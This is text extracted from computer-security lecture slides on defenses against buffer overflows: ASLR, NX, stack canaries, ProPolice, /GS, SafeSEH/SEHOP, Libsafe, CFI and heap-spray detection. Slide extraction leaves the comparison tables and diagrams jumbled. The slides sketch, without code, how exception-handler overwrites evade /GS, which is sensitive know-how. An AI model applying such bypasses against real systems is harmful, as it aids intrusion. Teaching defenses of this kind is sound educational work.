Effectiveness and Limitations


* When Applicable


Stack Non-Execute (NX)*

Heap Non-Execute (NX)*

Exception Handlers

Non-Execute (NX)*

Dawn Song 95

Defense II: Address Randomization

Reserved for Kernal

user stack

shared libraries

run time heap

static data segment


unused

-0xC0000000

-0x40000000

-0x08048000

-0x00000000

-0xFFFFFFFF

-0xBFF9AB20

Reserved for Kernal

unused

user stack

shared libraries

run time heap

static data segment


unused

• ASLR: (Address Space Layout Randomization)

– Start stack at a random location– Start heap at a random locatioin– Map shared libraries to rand location in process

memory Attacker cannot jump directly to exec function

– Deployment: (/DynamicBase)

• Windows Vista: 8 bits of randomness for DLLs

– aligned to 64K page in a 16MB region 256 choices

• Linux (via PaX): 16 bits of randomness for libraries

– More effective on 64-bit architectures

• Other randomization methods:– Sys-call randomization: randomize sys-call id’s

– Instruction Set Randomization (ISR)

Dawn Song 96

• Limitations– Randomness is limited– Some vulnerabilities can allow secret to be leaked


Stack Non-Execute (NX)*ASLR

ASLR

Heap Non-Execute (NX)*ASLR

ASLR

Exception Handlers

Non-Execute (NX)*ASLR

ASLR


* When Applicable


Dawn Song 97

Defense III: StackGuard• Run time tests for stack integrity • Embed “canaries” in stack frames

and verify their integrity prior to function return

arguments

return address

stack frame pointer

CANARY

local variables

Dawn Song 98

Canary Types

• Random canary:– Random string chosen at program startup.– Insert canary string into every stack frame.– Verify canary before returning from function.

• Exit program if canary changed. Turns potential exploit into DoS.

– To exploit successfully, attacker must learn current random string.

• Terminator canary: Canary = {0, newline, linefeed, EOF}

– String functions will not copy beyond terminator.– Attacker cannot use string functions to corrupt stack.

Dawn Song 99

StackGuard (Cont.)• StackGuard implemented as a GCC patch.

– Program must be recompiled.

• Low performance effects: 8% for Apache.

• Note: Canaries don’t provide full proof protection.– Some stack smashing attacks leave canaries unchanged

• Heap protection: PointGuard.– Protects function pointers and setjmp buffers by

encrypting them: e.g. XOR with random cookie– Less effective, more noticeable performance effects

Dawn Song 100

StackGuard enhancements: ProPolice

• ProPolice (IBM) - gcc 3.4.1. (-fstack-protector)

– Rearrange stack layout to prevent ptr overflow.

StackGrowth pointers, but no arrays

StringGrowth Protects pointer args and local

pointers from a buffer overflow

arguments

return address

stack frame pointer

CANARY

local string buffers

local string variables

local non-buffer variables

copy of pointer args

Dawn Song 101

MS Visual Studio /GS [since 2003]

Compiler /GS option:– Combination of ProPolice and Random canary.– If cookie mismatch, default behavior is to call _exit(3)

Function prolog: sub esp, 8 // allocate 8 bytes for cookie mov eax, DWORD PTR ___security_cookie xor eax, esp // xor cookie with current esp mov DWORD PTR [esp+8], eax // save in stack

Function epilog: mov ecx, DWORD PTR [esp+8] xor ecx, esp call @__security_check_cookie@4 add esp, 8

Enhanced /GS in Visual Studio 2010:– /GS protection added to all functions, unless can be proven unnecessary

Dawn Song 102

/GS stack frame

StackGrowth

pointers, but no arrays

StringGrowth

Canary protects ret-addr and exception handler frame

arguments

return address

stack frame pointer

exception handlers

CANARY

local string buffers

local string variables

local non-buffer variables

Dawn Song 103

• Limitation:– Evasion with exception handler


Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GS

ASLRStacKGuard(Canaries)ProPolice/GS

Heap Non-Execute (NX)*ASLRPointGuard

ASLRPointGuard

Exception Handlers

Non-Execute (NX)*ASLR

ASLR

Defenses/Mitigations* When Applicable


Evading /GS with exception handlers

• When exception is thrown, dispatcher walks up exception list until handler is found (else use default handler)

After overflow: handler points to attacker’s codeexception triggered control hijack⇒

Main point: exception is triggered before canary is checked

handler

next

handler

next

buffer

handler

nextSEH frame

handler

next

handler

crafted ptr

buffer

handler

next

Dawn Song 105

Defense III: SAFESEH and SEHOP

• /SAFESEH: linker flag– Linker produces a binary with a table of safe exception handlers– System will not jump to exception handler not on list

• /SEHOP: platform defense (since win vista SP1)– Observation: SEH attacks typically corrupt the “next” entry in SEH list.– SEHOP: add a dummy record at top of SEH list– When exception occurs, dispatcher walks up list and verifies dummy

record is there. If not, terminates process.

Dawn Song 106

• Limitations:– Require recompilation


Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GS

ASLRStacKGuard(Canaries)ProPolice/GS


ASLRPointGuard

Exception Handlers

Non-Execute (NX)*ASLRSAFESEH and SEHOP

ASLRSAFESEH and SEHOP

Defenses/Mitigations* When Applicable


Dawn Song 107

Defense IV: Libsafe

• Dynamically loaded library (no need to recompile app.)

• Intercepts calls to strcpy (dest, src)

– Validates sufficient space in current stack frame:

|frame-pointer – dest| > strlen(src)

– If so, does strcpy. Otherwise, terminates application

Libsafe strcpy

return address

stack frme pointer

buf

src

dest

ret

sfp

main

Dawn Song 108

• Limitations:– Limited protection


Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GSlibsafe

ASLRStacKGuard(Canaries)ProPolice/GSlibsafe


ASLRPointGuard

Exception Handlers



Defenses/Mitigations * When Applicable


Dawn Song 109

Other Defenses StackShield

At function prologue, copy return address RET and SFP to “safe” location (beginning of data segment)

Upon return, check that RET and SFP is equal to copy.

Implemented as assembler file processor (GCC)

Control Flow Integrity (CFI)

A combination of static and dynamic checking Statically determine program control flow

Dynamically enforce control flow integrity

Dawn Song 110

• Many different kinds of attacks. Not one silver bullet defense.


Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GSStackShieldlibsafe

ASLRStacKGuard(Canaries)ProPolice/GSStackShieldlibsafe


ASLRPointGuard

Exception Handlers



Defenses/Mitigations * When Applicable


Dawn Song 111

Dawn Song 112

(partial) Defenses• Protect heap function pointers

(e.g. PointGuard)

• Better browser architecture:– Store JavaScript strings in a separate

heap from browser heap

• OpenBSD heap overflow protection:

• Nozzle [RLZ’08] : detect sprays by prevalence of code on heap

non-writable pages

prevents cross-pageoverflows

(HEAP)

Dawn Song 113

• Many different kinds of attacks. Not one silver bullet defense.


Stack Non-Execute (NX)*ASLRStacKGuard(Canaries)ProPolice/GSStackShieldControl Flow Integrity (CFI)

ASLRStacKGuard(Canaries)ProPolice/GSStackShieldControl Flow Integrity (CFI)

Heap Non-Execute (NX)*ASLRPointGuardOpenBSD Heap overflow protectionNozzle

ASLRPointGuardOpenBSD Heap overflow protectionNozzle

Exception Handlers




Others:

* When Applicable

Libsafe


day 1-1-intro-sw-vuls

Education

security vulnerabilities

overview of web security

web security droidblaze

computer security webblaze

computer security course

software security analysis

computer security class

basic security properties